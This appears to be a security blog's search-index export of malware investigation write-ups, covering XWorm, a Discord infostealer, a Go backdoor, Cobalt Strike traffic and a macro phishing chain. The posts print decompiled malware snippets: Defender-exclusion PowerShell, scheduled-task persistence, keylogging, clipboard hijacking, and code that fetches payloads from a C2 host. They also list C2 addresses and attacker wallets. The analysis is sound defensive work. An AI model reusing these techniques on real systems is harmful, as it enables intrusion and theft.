crypto wallets 4→ MITRE T1041: Exfiltration Over C2 Channel Lateral Movement\n1ET INFO NTLM Session Setup Request - Negotiate 2→ src: 10.2.8.101 → dest: 10.2.8.2 (internal gateway) 3→ NTLM authentication attempt against internal host via SMB 4→ MITRE T1550.002: Pass the Hash / T1021.002: SMB Phishing Infrastructure\n1ET PHISHING Lets Encrypt Free SSL Cert with IDN/Punycode Domain 2→ dest: 162.241.149.195 3→ Contact with phishing domain using lookalike certificate 4→ MITRE T1566: Phishing Detection Gap # All 423 Suricata alerts arrived in Wazuh at rule.level 3 — informational severity. 
This is a default integration gap: Wazuh rule 86601 maps all Suricata alerts to level 3 regardless of the underlying Suricata severity.\nResponse # To escalate Cobalt Strike detections to critical severity, a custom rule was added to /var/ossec/etc/rules/local_rules.xml:\n1\u0026lt;group name=\u0026#34;suricata,\u0026#34;\u0026gt; 2 \u0026lt;rule id=\u0026#34;100002\u0026#34; level=\u0026#34;12\u0026#34;\u0026gt; 3 \u0026lt;if_sid\u0026gt;86601\u0026lt;/if_sid\u0026gt; 4 \u0026lt;field name=\u0026#34;data.alert.signature\u0026#34;\u0026gt;Cobalt Strike\u0026lt;/field\u0026gt; 5 \u0026lt;description\u0026gt;Suricata: Cobalt Strike C2 Beacon — Critical\u0026lt;/description\u0026gt; 6 \u0026lt;mitre\u0026gt; 7 \u0026lt;id\u0026gt;T1071.001\u0026lt;/id\u0026gt; 8 \u0026lt;/mitre\u0026gt; 9 \u0026lt;/rule\u0026gt; 10\u0026lt;/group\u0026gt; The recommended response would be:\n- Block all identified external C2 IPs at the perimeter firewall\n- Isolate the infected host (10.2.8.101) from the network immediately\n- Search for the dropper binary (6lhjgfdghj.exe) across all endpoints\n- Reset credentials for all accounts active on the infected host\n- Hunt for Cobalt Strike beacon artifacts in memory and persistence mechanisms\nConclusion # Replaying a PCAP through Suricata integrated with Wazuh produced 423 alerts covering a complete infection chain — from initial payload delivery through C2 communication, credential theft, and lateral movement attempts.\nKey takeaways:\n- Hancitor acted as initial dropper, deploying Cobalt Strike, Dridex, and Ficker Stealer\n- Suricata + Wazuh provides full visibility into multi-stage malware behavior\n- Default Wazuh integration sets all Suricata alerts at level 3 — custom rules required for critical escalation\n- Correlating timestamps across 11 signature IDs revealed a complete 7-stage infection chain\n","date":"March 2, 2026","externalUrl":null,"permalink":"/blue_team/wazuh+suricata-malware-traffic/","section":"","summary":"Replayed a 
malicious PCAP file containing Hancitor dropper traffic that deployed Cobalt Strike, Dridex, and Ficker Stealer. Analyzed 423 Suricata alerts in Wazuh, reconstructed the full infection chain, and mapped findings to MITRE ATT\u0026CK.","title":"Wazuh + Suricata: Malware traffic","type":"blue_team"},{"content":"","date":"March 1, 2026","externalUrl":null,"permalink":"/tags/.net/","section":"Tags","summary":"","title":".NET","type":"tags"},{"content":" Difficulty: Medium OS: Windows Date: 2026-02-28 TL;DR # A .NET XWorm RAT detected by Capa rules. It drops a copy of itself as WmiPrvSE.exe to masquerade as a legitimate Windows process, establishes triple persistence via scheduled task, startup folder shortcut, and registry Run key, bypasses Windows Defender via exclusion rules, implements a low-level keylogger via SetWindowsHookEx, hijacks clipboard content targeting Bitcoin and Ethereum wallet addresses, and communicates with three C2 servers over TCP using AES-ECB encrypted payloads.\nInitial Analysis # 1xworm.exe: PE32 executable (GUI) Intel i386 Mono/.Net assembly, 3 sections 2SHA256: ced525930c76834184b4e194077c8c4e7342b3323544365b714943519a0f92af 3MD5: 7c7aff561f11d16a6ec8a999a2b8cdad The binary was identified as XWorm Payload by a Capa rule.\nSandbox Analysis # Seconds after execution the sample dropped a copy of itself as WmiPrvSE.exe in %APPDATA% — impersonating the legitimate WMI Provider Host process to blend in with normal system activity.\nAn encrypted configuration file xworm.exe.config was created in %TEMP%:\nThe decrypted configuration revealed:\n1C2 Servers: 185.117.250.169, 66.175.239.149, 185.117.249.43 2Port: 7000 3Key: 8xTJ0EKPuiQsJVaT 4USB copy: USB.exe The config also contained hardcoded cryptocurrency wallet addresses used for clipboard hijacking:\n1Bitcoin: bc1q2a4jgxmvslng5khwvzkt9pechms20ghff42s5g 2Ethereum: 0x10cE3E5678f40f0B94A2fB5003f04012ecA407C5 Persistence # Scheduled Task # Created a scheduled task WmiPrvSE that executes the dropped 
binary every minute with highest privileges:\n1schtasks.exe /create /f /RL HIGHEST /sc minute /mo 1 2 /tn \u0026#34;WmiPrvSE\u0026#34; 3 /tr \u0026#34;C:\\Users\\admin\\AppData\\Roaming\\WmiPrvSE.exe\u0026#34; 1ProcessStartInfo processStartInfo = new ProcessStartInfo(\u0026#34;schtasks.exe\u0026#34;); 2processStartInfo.Arguments = string.Concat(new string[] 3{ 4 \u0026#34;/create /f /RL HIGHEST /sc minute /mo 1 /tn \\\u0026#34;\u0026#34;, 5 Path.GetFileNameWithoutExtension(NB2mi1VBTSN5U40DfEsDcrzgxWCrxt7i1yCoMW0Zb5dK9QwIjZ6W6wYeHriq.EB5J4sIzfH74BwfgRjacCtnEuNWFxu93z57nr4HrttTW5asXOhadv7pC7YFu), 6 \u0026#34;\\\u0026#34; /tr \\\u0026#34;\u0026#34;, text, \u0026#34;\\\u0026#34;\u0026#34; 7}); 8Process process = Process.Start(processStartInfo); Startup Folder # Created a .lnk shortcut in the Windows Startup folder to ensure execution on every user login:\n1C:\\Users\\%User%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup Run Registry Key # Set a registry Run key to execute WmiPrvSE.exe on user login:\n1HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\WmiPrvSE Static Analysis # Encryption # Configuration data was encrypted using AES-ECB mode. 
The key was derived by computing an MD5 hash of a hardcoded string and copying the result twice into a 32-byte array:\n1RijndaelManaged rijndaelManaged = new RijndaelManaged(); 2MD5CryptoServiceProvider md5CryptoServiceProvider = new MD5CryptoServiceProvider(); 3byte[] array = new byte[32]; 4byte[] sourceArray = md5CryptoServiceProvider.ComputeHash(ACX0qTJzEzq40qP5qFxb.wVkaAAeCf6BeWi8Flwtq(NB2mi1VBTSN5U40DfEsDcrzgxWCrxt7i1yCoMW0Zb5dK9QwIjZ6W6wYeHriq.DhMybcleyUJ8bZbaqtAkL3FTz6SQ840xELBsFWt9yekNCVYQ1WgRtjL1bTF3)); 5Array.Copy(sourceArray, 0, array, 0, 16); 6Array.Copy(sourceArray, 0, array, 15, 16); 7rijndaelManaged.Key = array; 8rijndaelManaged.Mode = CipherMode.ECB; 9ICryptoTransform cryptoTransform = rijndaelManaged.CreateDecryptor(); 10byte[] array2 = Convert.FromBase64String(3pXqYfeWgCBZOAYUjYnh); 11return ACX0qTJzEzq40qP5qFxb.sJljw7gGxcYB8jRe1fPv(cryptoTransform.TransformFinalBlock(array2, 0, array2.Length)); Windows Defender Bypass # Added exclusions for both the file path and process name to prevent Defender from scanning or terminating the dropped binary:\n1powershell -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath \u0026#39;C:\\Users\\Admin\\AppData\\Roaming\\WmiPrvSE.exe\u0026#39; 2powershell -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess \u0026#39;WmiPrvSE.exe\u0026#39; Keylogging # Installed a low-level keyboard hook via SetWindowsHookEx to capture all keystrokes system-wide. In the obfuscated binary, the P/Invoke wrapper for this import is renamed to v2H7UaTp8QLeiqSYflzi3sclFElatUojEHCwvOIoXHXii3FlZocIVLQx9c8vO5vW9iL6KiRzIfUyn. Each captured key was normalized — special keys were mapped to readable labels — and written to a log file grouped by active window title. 
U\n1[DllImport(\u0026#34;user32.dll\u0026#34;, CharSet = CharSet.Auto, EntryPoint = \u0026#34;SetWindowsHookEx\u0026#34;, SetLastError = true)] Key normalization from the hook callback:\n1if (Operators.CompareString(left, \u0026#34;Space\u0026#34;, false) == 0) obj2 = \u0026#34;[SPACE]\u0026#34;; 2else if (Operators.CompareString(left, \u0026#34;Return\u0026#34;, false) == 0) obj2 = \u0026#34;[ENTER]\u0026#34;; 3else if (Operators.CompareString(left, \u0026#34;Escape\u0026#34;, false) == 0) obj2 = \u0026#34;[ESC]\u0026#34;; 4else if (Operators.CompareString(left, \u0026#34;LControlKey\u0026#34;, false) == 0) obj2 = \u0026#34;[CTRL]\u0026#34;; 5else if (Operators.CompareString(left, \u0026#34;RControlKey\u0026#34;, false) == 0) obj2 = \u0026#34;[CTRL]\u0026#34;; 6else if (Operators.CompareString(left, \u0026#34;RShiftKey\u0026#34;, false) == 0) obj2 = \u0026#34;[Shift]\u0026#34;; 7else if (Operators.CompareString(left, \u0026#34;LShiftKey\u0026#34;, false) == 0) obj2 = \u0026#34;[Shift]\u0026#34;; 8else if (Operators.CompareString(left, \u0026#34;Back\u0026#34;, false) == 0) obj2 = \u0026#34;[Back]\u0026#34;; 9else if (Operators.CompareString(left, \u0026#34;LWin\u0026#34;, false) == 0) obj2 = \u0026#34;[WIN]\u0026#34;; 10else if (Operators.CompareString(left, \u0026#34;Tab\u0026#34;, false) == 0) obj2 = \u0026#34;[Tab]\u0026#34;; 11else if (Operators.CompareString(left, \u0026#34;Capital\u0026#34;, false) == 0) 12...[snip]... Clipboard Hijacking # Monitored the clipboard for content matching Bitcoin, Ethereum, and TRON wallet address patterns using hardcoded regex. 
When a match was found, the clipboard content was silently replaced with the attacker\u0026rsquo;s wallet address:\n1public static readonly Regex S0cI7Hk6bzcFtEvd7Fqm = new Regex(\u0026#34;\\\\b(bc1|[13])[a-zA-HJ-NP-Z0-9]{26,45}\\\\b\u0026#34;); 2public static readonly Regex KsKw6uC5CNpIU5XtEe7i = new Regex(\u0026#34;\\\\b(0x)[a-zA-HJ-NP-Z0-9]{40,45}\\\\b\u0026#34;); 3public static readonly Regex 2AsDRG7TDiHYSfLmSTs2 = new Regex(\u0026#34;T[A-Za-z1-9]{33}\u0026#34;); C2 Communication # Connected to C2 servers via TCP and transmitted an INFO packet containing HWID, username, OS version, and AV status — encrypted with the AES-ECB key from the config. Data was prefixed with a length header. Periodic PING! packets were sent to maintain the connection. Outbound requests used hardcoded User-Agent strings to blend with normal browser traffic:\n1\u0026#34;Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0\u0026#34;, 2\u0026#34;Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1\u0026#34;, 3\u0026#34;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\u0026#34; The malware also called RtlSetProcessIsCritical from ntdll.dll to mark itself as a critical process — causing a BSOD if terminated:\n1[DllImport(\u0026#34;NTdll.dll\u0026#34;, EntryPoint = \u0026#34;RtlSetProcessIsCritical\u0026#34;, SetLastError = true)] 2public static extern void H8daqEsgsEVBpFZFnlWT([MarshalAs(UnmanagedType.Bool)] bool tW8JLDDvidchK66hQUnZ, [MarshalAs(UnmanagedType.Bool)] ref bool IgYCKHiXpqcNX0SKbJFS, [MarshalAs(UnmanagedType.Bool)] bool tZzpk5hGM0iIAqJM0bgw); IOCs # Files\n- xworm.exe\n- SHA256: ced525930c76834184b4e194077c8c4e7342b3323544365b714943519a0f92af\n- MD5: 7c7aff561f11d16a6ec8a999a2b8cdad\n- %APPDATA%\\WmiPrvSE.exe — persistence copy\n- %TEMP%\\xworm.exe.config — encrypted config\nNetwork\n- C2: 
185.117.250.169:7000\n- C2: 66.175.239.149:7000\n- C2: 185.117.249.43:7000\nRegistry\n- HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\WmiPrvSE\nScheduled Tasks\n- WmiPrvSE — executes every 1 minute with HIGHEST privileges\nCrypto Wallets (attacker)\n- Bitcoin: bc1q2a4jgxmvslng5khwvzkt9pechms20ghff42s5g\n- Ethereum: 0x10cE3E5678f40f0B94A2fB5003f04012ecA407C5\nMITRE ATT\u0026amp;CK # Technique ID Description Scheduled Task/Job T1053.005 WmiPrvSE scheduled task every 1 minute Registry Run Keys T1547.001 HKCU...\\Run\\WmiPrvSE Shortcut Modification T1547.009 .lnk in Startup folder Masquerading T1036.005 Renamed to WmiPrvSE.exe Disable or Modify Tools T1562.001 Windows Defender exclusions via PowerShell Virtualization/Sandbox Evasion T1497.001 WMI Win32_ComputerSystem VM check Input Capture: Keylogging T1056.001 SetWindowsHookEx low-level keyboard hook Clipboard Data T1115 Crypto wallet address hijacking Encrypted Channel T1573 AES-ECB encrypted C2 communication Data Obfuscation T1001 Length-prefixed TCP packets + PING keepalive Attack Flow # %%{init: {'theme': 'base', 'themeVariables': { 'background': '#ffffff', 'mainBkg': '#ffffff', 'primaryTextColor': '#000000', 'lineColor': '#333333', 'clusterBkg': '#ffffff', 'clusterBorder': '#333333'}}}%% graph TD classDef default fill:#f9f9f9,stroke:#333,stroke-width:1px,color:#000; classDef input fill:#e1f5fe,stroke:#0277bd,stroke-width:2px,color:#000; classDef check fill:#fff9c4,stroke:#fbc02d,stroke-width:2px,stroke-dasharray: 5 5,color:#000; classDef exec fill:#ffebee,stroke:#c62828,stroke-width:2px,color:#000; classDef term fill:#e0e0e0,stroke:#333,stroke-width:2px,color:#000; Start([xworm.exe Executed]):::input --\u003e Drop[Drop WmiPrvSE.exe%APPDATA%]:::exec subgraph Evasion [Evasion] Drop --\u003e AntiVM:::check AntiVM -.-\u003e|VM Detected| Exit[Exit]:::term AntiVM -- Pass --\u003e Defender[Disable DefenderAdd-MpPreference Exclusions]:::exec Defender --\u003e Critical[RtlSetProcessIsCriticalBSOD on 
Kill]:::exec end subgraph Persistence [Persistence] Critical --\u003e Task[Scheduled TaskWmiPrvSE every 1min]:::exec Critical --\u003e Startup[Startup Folder.lnk Shortcut]:::exec Critical --\u003e Registry[HKCU\\\\Run\\\\WmiPrvSE]:::exec end subgraph Collection [Collection] Task --\u003e Keylog[SetWindowsHookExKeylogger]:::exec Task --\u003e Clipboard[Clipboard HijackingBTC / ETH / TRON]:::exec end subgraph C2 [C2 Communication] Keylog --\u003e C2Server[TCP AES-ECBINFO + PING]:::exec Clipboard --\u003e C2Server C2Server --\u003e IP1((185.117.250.169:7000)):::exec C2Server --\u003e IP2((66.175.239.149:7000)):::exec C2Server --\u003e IP3((185.117.249.43:7000)):::exec end ","date":"March 1, 2026","externalUrl":null,"permalink":"/investigations/cdef-xworm/","section":"","summary":"A .NET XWorm RAT that establishes triple persistence via scheduled task, startup shortcut, and registry Run key, implements keylogging, clipboard hijacking for crypto wallets, and communicates with multiple C2 servers over TCP using AES-ECB encrypted payloads.","title":"CDEF-XWorm","type":"investigations"},{"content":"","date":"March 1, 2026","externalUrl":null,"permalink":"/tags/clipboard-hijacking/","section":"Tags","summary":"","title":"Clipboard Hijacking","type":"tags"},{"content":"","date":"March 1, 2026","externalUrl":null,"permalink":"/tags/cryptocurrency-stealer/","section":"Tags","summary":"","title":"Cryptocurrency Stealer","type":"tags"},{"content":"","date":"March 1, 2026","externalUrl":null,"permalink":"/tags/dnspy/","section":"Tags","summary":"","title":"Dnspy","type":"tags"},{"content":"","date":"March 1, 2026","externalUrl":null,"permalink":"/tags/sandbox/","section":"Tags","summary":"","title":"Sandbox","type":"tags"},{"content":"","date":"March 1, 2026","externalUrl":null,"permalink":"/tags/xworm/","section":"Tags","summary":"","title":"XWorm","type":"tags"},{"content":"","date":"February 28, 
2026","externalUrl":null,"permalink":"/tags/debug/","section":"Tags","summary":"","title":"Debug","type":"tags"},{"content":"","date":"February 28, 2026","externalUrl":null,"permalink":"/tags/golang/","section":"Tags","summary":"","title":"Golang","type":"tags"},{"content":" Difficulty: Easy OS: Windows Date: 2026-02-08 TL;DR # A Go-based backdoor that copies itself to C:\\Systemlogs\\logscheck.exe, establishes persistence via HKCU\\...\\Run\\HealthCheck, enumerates connected drives via GetDriveType, and attempts to connect to malware.invalid.com.\nInitial Analysis # 1secretPictures.exe: PE32+ executable (console) x86-64, 8 sections 2SHA256: 80e82415a26ac7c0124bbaa2133192dadd51cbc5ed22b202ebb24f6fddf8c8ab Static analysis confirmed the binary was written in Go.\nSandbox Analysis # Seconds after execution the sample copied itself to C:\\Systemlogs\\ and renamed itself to logscheck.exe.\nPersistence # A registry Run key was set to execute logscheck.exe on every user login:\n1HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\HealthCheck C2 Communication # The sample attempted to connect to the hardcoded domain malware.invalid.com.\nDrive Enumeration # The sample called the GetDriveType WinAPI function to enumerate all connected drives — likely to identify removable media or network shares for lateral movement or data staging.\nIOCs # Files\n- secretPictures.exe\n- SHA256: 80e82415a26ac7c0124bbaa2133192dadd51cbc5ed22b202ebb24f6fddf8c8ab\n- C:\\Systemlogs\\logscheck.exe — persistence copy\nRegistry\n- HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\HealthCheck\nNetwork\n- C2 Domain: malware.invalid.com\n","date":"February 28, 2026","externalUrl":null,"permalink":"/investigations/htb-secretpictures/","section":"","summary":"A Go-based backdoor that copies itself to a system directory, establishes persistence via a registry Run key, enumerates connected drives, and attempts to connect to a hardcoded C2 
domain.","title":"HTB-SecretPictures","type":"investigations"},{"content":" Difficulty: Medium OS: Windows Date: 2026-02-08 TL;DR # A fake therapy installer distributed as an NSIS self-extracting archive delivers an Electron-based Node.js infostealer. After passing anti-VM checks, it injects malicious code into Discord clients, harvests Discord tokens, browser cookies, saved passwords, and autofill data, and exfiltrates everything to illitmagnetic.site.\nInitial Analysis # It is an NSIS self-extracting archive. An NSIS package is essentially a self-extracting archive coupled with an installation system that supports a scripting language. It contains compressed files, along with installation instructions written in the NSIS scripting language.\n1nsis-installer.exe: PE32 executable for MS Windows 4.00 (GUI), Intel i386, Nullsoft Installer self-extracting archive, 5 sections 27a95214e7077d7324c0e8dc7d20f2a4e625bc0ac7e14b1446e37c47dff7eeb5b 3imphash: b34f154ec913d2d2c435cbd644e91687 The binary contained a digital signature with the program name Windows Update Assistant.\nNSIS # To access the contents without running the installation package, I used 7-Zip.\n1$ 7z x nsis-installer.exe -o./extracted/ 2Extracting archive: nsis-installer.exe 3...[snip]... 4 5Everything is Ok 6 7Files: 8 8Size: 78250603 9Compressed: 78057262 NSIS supports a plugin system, which consists of DLL files that are placed by default in the $PLUGINSDIR directory.\n1. 
2├── $PLUGINSDIR 3│ ├── app-32.7z 4│ ├── nsExec.dll 5│ ├── nsis7z.dll 6│ ├── SpiderBanner.dll 7│ ├── StdUtils.dll 8│ ├── System.dll 9│ └── WinShell.dll 10└── $R0 11 └── Uninstall SerenityTherapyInstaller.exe\n- nsis7z.dll — 7z extraction plugin\n- nsExec.dll — command execution plugin\n- System.dll — direct WinAPI call plugin\n- StdUtils.dll — extended NSIS utilities\n- SpiderBanner.dll — UI plugin\n- WinShell.dll — Windows Shell integration plugin\n- app-32.7z - main functionality\nElectron Application # Unpacking app-32.7z revealed an Electron application — a Chromium and Node.js runtime packaged as a Windows executable, allowing JavaScript malware to run as a native process:\n1...[snip]... 2├── resources 3│ ├── app.asar 4│ └── elevate.exe 5├── SerenityTherapyInstaller.exe 6...[snip]... The app.asar archive was extracted with asar. The extracted folder contains:\n1app.js: JavaScript source, ASCII text, with very long lines (65536), with no line terminators 2node_modules: directory 3package.json: JSON text data Malware\u0026rsquo;s dependencies:\n1{ 2 \u0026#34;name\u0026#34;: \u0026#34;SerenityTherapyInstaller\u0026#34;, 3 \u0026#34;version\u0026#34;: \u0026#34;1.0.0\u0026#34;, 4 \u0026#34;main\u0026#34;: \u0026#34;app.js\u0026#34;, 5 \u0026#34;nodeVersion\u0026#34;: \u0026#34;system\u0026#34;, 6 \u0026#34;bin\u0026#34;: \u0026#34;app.js\u0026#34;, 7 \u0026#34;author\u0026#34;: \u0026#34;SerenityTherapyInstaller Inc\u0026#34;, 8 \u0026#34;license\u0026#34;: \u0026#34;ISC\u0026#34;, 9 \u0026#34;dependencies\u0026#34;: { 10 \u0026#34;@primno/dpapi\u0026#34;: \u0026#34;1.1.1\u0026#34;, 11 \u0026#34;node-addon-api\u0026#34;: \u0026#34;^7.0.0\u0026#34;, 12 \u0026#34;sqlite3\u0026#34;: \u0026#34;^5.1.6\u0026#34;, 13 \u0026#34;systeminformation\u0026#34;: \u0026#34;^5.21.22\u0026#34; 14 } 15} Deobfuscation # app.js was heavily obfuscated with hex-encoded identifiers and arithmetic string lookups. 
Deobfuscation with Obfuscator.io produced no usable result.\n1var _0x448105 = _0x14c9; 2(function(_0x2f383b, _0x170714) { 3 var _0x5f100f = _0x14c9, _0x3c3f7b = _0x2f383b(); 4 while (!![]) { 5 try { 6 var _0x2e3a8b = -parseInt(_0x5f100f(0x1088)) / ... Dynamic Analysis # The obfuscated script was analyzed using the VS Code Debugger. A version conflict with the bundled sqlite3 module was identified on first run.\nOn the second run, the deobfuscated script appeared in the \u0026ldquo;Loaded Scripts\u0026rdquo; panel as \u0026lt;eval\u0026gt; / VM46947589 — 800+ lines of readable JavaScript.\nStatic Analysis # The deobfuscated source reveals the full capability set of the malware:\n- getDiscordTokens, discordInjection - harvests Discord tokens and injects malicious code into the Discord client\n- stealFirefoxTokens - extracts saved session tokens from Firefox\n- browserCookies, getBrowserCookies, getFirefoxCookies — steals cookies across Chromium-based browsers and Firefox\n- browserPasswords, getBrowserPasswords — extracts saved credentials from browser password stores\n- browserAutofills, getBrowserAutofills — harvests autofill data\n- tokenRequests, checkToken — validates and exfiltrates harvested tokens\n- newInjection - generic injection capability\n- checkCmdInstallation — checks for presence of specific tools, likely for persistence or lateral movement\n- kill — terminates processes\nC2 config # Contained a hardcoded configuration block that revealed the C2 domain illitmagnetic.site, the target Discord user ID, and whether to log out the victim from Discord after token theft.\n1const options = { 2 api: \u0026#39;https://illitmagnetic.site/api/\u0026#39;, 3 user_id: \u0026#39;6270048187\u0026#39;, 4 logout_discord: \u0026#39;false\u0026#39; 5}; Anti-VM # Exits if RAM is under 2GB or the hostname matches a hardcoded blocklist of known analysis machines, and kills any recognized analysis tools found in the running process list.\n1function checkVm() { 2 if(Math.round(totalmem() / (1024 * 1024 * 1024)) 
\u0026lt; 2) process.exit(1); 3 if([\u0026#39;bee7370c-8c0c-4\u0026#39;, \u0026#39;desktop-nakffmt\u0026#39;, \u0026#39;win-5e07cos9alr\u0026#39;, ... 4 ].includes(hostname().toLowerCase())) process.exit(1); 5 6 const tasks = execSync(\u0026#39;tasklist\u0026#39;); 7 [\u0026#39;wireshark\u0026#39;, \u0026#39;fiddler\u0026#39;, \u0026#39;vboxservice\u0026#39;, \u0026#39;vmtoolsd\u0026#39;, \u0026#39;ida64\u0026#39;, \u0026#39;x32dbg\u0026#39;, ... 8 ].forEach((task) =\u0026gt; { 9 if(tasks.includes(task)) 10 execSync(`taskkill /f /im ${task}.exe`); 11 }); 12}; Discord Injection # Fetched a malicious index.js from the C2 and overwrote the legitimate discord_desktop_core-1/index.js in all installed Discord variants (Discord, DiscordCanary, DiscordPTB), then restarted the client to load the injected code:\n1async function discordInjection() { 2 [join(LOCALAPPDATA, \u0026#39;Discord\u0026#39;), join(LOCALAPPDATA, \u0026#39;DiscordCanary\u0026#39;), 3 join(LOCALAPPDATA, \u0026#39;DiscordPTB\u0026#39;)].forEach(async(dir) =\u0026gt; { 4 const data = await fetch(options.api + \u0026#39;injections\u0026#39;, ...); 5 writeFileSync(discord_index, data?.discord); 6 await kill([\u0026#39;discord\u0026#39;, \u0026#39;discordcanary\u0026#39;, \u0026#39;discordptb\u0026#39;]); 7 exec(`Update.exe --processStart Discord.exe`); 8 }); 9}; checkCmdInstallation # Verified the presence of cmd.exe at C:\\Windows\\system32\\cmd.exe. 
If absent — a sandbox or restricted environment indicator — it fetched a replacement cmd.exe from the C2 and wrote it to %USERPROFILE%\\Documents\\, then redirected ComSpec to point to the downloaded binary.\n1async function checkCmdInstallation() { 2 if(!existsSync(\u0026#39;C:\\\\Windows\\\\system32\\\\cmd.exe\u0026#39;)) { 3 const response = await fetch(options.api + \u0026#39;cmd-file\u0026#39;, ...); 4 writeFileSync(join(process.env.USERPROFILE, \u0026#39;Documents\u0026#39;, \u0026#39;cmd.exe\u0026#39;), 5 Buffer.from(response?.buffer)); 6 process.env.ComSpec = join(process.env.USERPROFILE, \u0026#39;Documents\u0026#39;, \u0026#39;cmd.exe\u0026#39;); 7 } 8}; Browser Data Collection # Killed all running browser processes before accessing locked database files, then collected cookies, saved passwords, and autofill entries from Chromium-based browsers by decrypting the Local State master key via DPAPI and decrypting each value with AES-256-GCM. Firefox cookies were read directly from moz_cookies via SQLite. 
All collected data was POSTed to options.api + 'browsers-data'.\nnewInjection # Collected system fingerprint data (OS, CPU, RAM, uptime) and the victim\u0026rsquo;s external IP via ipinfo.io, then reported the infection to options.api + 'new-injection' along with the list of successfully injected Discord clients.\nSandbox # IOCs # Files\n- nsis-installer.exe\n- SHA256: 7a95214e7077d7324c0e8dc7d20f2a4e625bc0ac7e14b1446e37c47dff7eeb5b - SerenityTherapyInstaller.exe\nNetwork\n- C2 API: https://illitmagnetic.site/api/\n- Fingerprint: https://ipinfo.io/json\n- Discord API: https://discord.com/api/v10\nRegistry / Filesystem\n- %USERPROFILE%\\Documents\\cmd.exe — dropped if cmd.exe absent\n- Discord discord_desktop_core-1\\index.js — overwritten with C2 payload\n","date":"February 28, 2026","externalUrl":null,"permalink":"/investigations/htb-subatomic/","section":"","summary":"A fake therapy installer distributed as an NSIS self-extracting archive delivers an Electron-based Node.js infostealer that performs anti-VM checks, injects malicious code into Discord clients, and exfiltrates browser credentials, cookies, autofill data, and Discord tokens to a hardcoded C2.","title":"HTB-Subatomic","type":"investigations"},{"content":"","date":"February 28, 2026","externalUrl":null,"permalink":"/tags/installer/","section":"Tags","summary":"","title":"Installer","type":"tags"},{"content":"","date":"February 28, 2026","externalUrl":null,"permalink":"/tags/nsis/","section":"Tags","summary":"","title":"NSIS","type":"tags"},{"content":"","date":"February 28, 2026","externalUrl":null,"permalink":"/tags/self-extracting-archive/","section":"Tags","summary":"","title":"Self-Extracting Archive","type":"tags"},{"content":"","date":"February 20, 2026","externalUrl":null,"permalink":"/tags/hta/","section":"Tags","summary":"","title":"HTA","type":"tags"},{"content":" Difficulty: Hard OS: Windows Date: 2026-02-23 TL;DR # A phishing HTML file poses as an invoice and delivers a macro-enabled Excel 
workbook (invoice-42369643.xlsm). Upon opening, the Auto_Open macro assembles an HTA payload from three hidden sources — shape metadata, an OLE stream, and the active cell selection — and executes it via mshta.exe. The HTA lowers macro security via registry modification, then drops obfuscated VBA code that injects shellcode into a spawned rundll32.exe process. The shellcode establishes a reverse shell connection to evil-domain.no over port 443.\nInitial Analysis # The sample is an HTML file containing a single long line.\n1$ file * 2invoice-42369643.html: ASCII text, with very long lines (48949) Excel Analysis # Opening the HTML file in a sandbox downloaded a .xlsm file:\n1invoice-42369643.xlsm: Microsoft Excel 2007+ Static analysis with oleid confirmed the presence of suspicious VBA macros:\n1--------------------+--------------------+----------+-------------------------- 2Indicator |Value |Risk |Description 3--------------------+--------------------+----------+-------------------------- 4File format |MS Excel 2007+ |info | 5 |Macro-Enabled | | 6 |Workbook (.xlsm) | | 7--------------------+--------------------+----------+-------------------------- 8Container format |OpenXML |info |Container type 9--------------------+--------------------+----------+-------------------------- 10Encrypted |False |none |The file is not encrypted 11--------------------+--------------------+----------+-------------------------- 12VBA Macros |Yes, suspicious |HIGH |This file contains VBA 13 | | |macros. Suspicious 14 | | |keywords were found. Use 15 | | |olevba and mraptor for 16 | | |more info. 17--------------------+--------------------+----------+-------------------------- 18XLM Macros |No |none |This file does not contain 19 | | |Excel 4/XLM macros. 
20--------------------+--------------------+----------+-------------------------- olevba # olevba was used to extract and analyze the VBA code:\n1+----------+--------------------+---------------------------------------------+ 2|Type |Keyword |Description | 3+----------+--------------------+---------------------------------------------+ 4|AutoExec |Auto_Open |Runs when the Excel Workbook is opened | 5|AutoExec |Label1_Click |Runs when the file is opened and ActiveX | 6| | |objects trigger events | 7|Suspicious|Environ |May read system environment variables | 8|Suspicious|Open |May open a file | 9|Suspicious|Write |May write to a file (if combined with Open) | 10|Suspicious|Output |May write to a file (if combined with Open) | 11|Suspicious|Shell |May run an executable file or a system | 12| | |command | 13|Suspicious|Call |May call a DLL using Excel 4 Macros (XLM/XLF)| 14|Suspicious|Chr |May attempt to obfuscate specific strings | 15| | |(use option --deobf to deobfuscate) | 16|Suspicious|Hex Strings |Hex-encoded strings were detected, may be | 17| | |used to obfuscate strings (option --decode to| 18| | |see all) | 19|Suspicious|Base64 Strings |Base64-encoded strings were detected, may be | 20| | |used to obfuscate strings (option --decode to| 21| | |see all) | 22|IOC |LwTHLrGh.hta |Executable file name | 23+----------+--------------------+---------------------------------------------+ Seconds after opening, Auto_Open fires. 
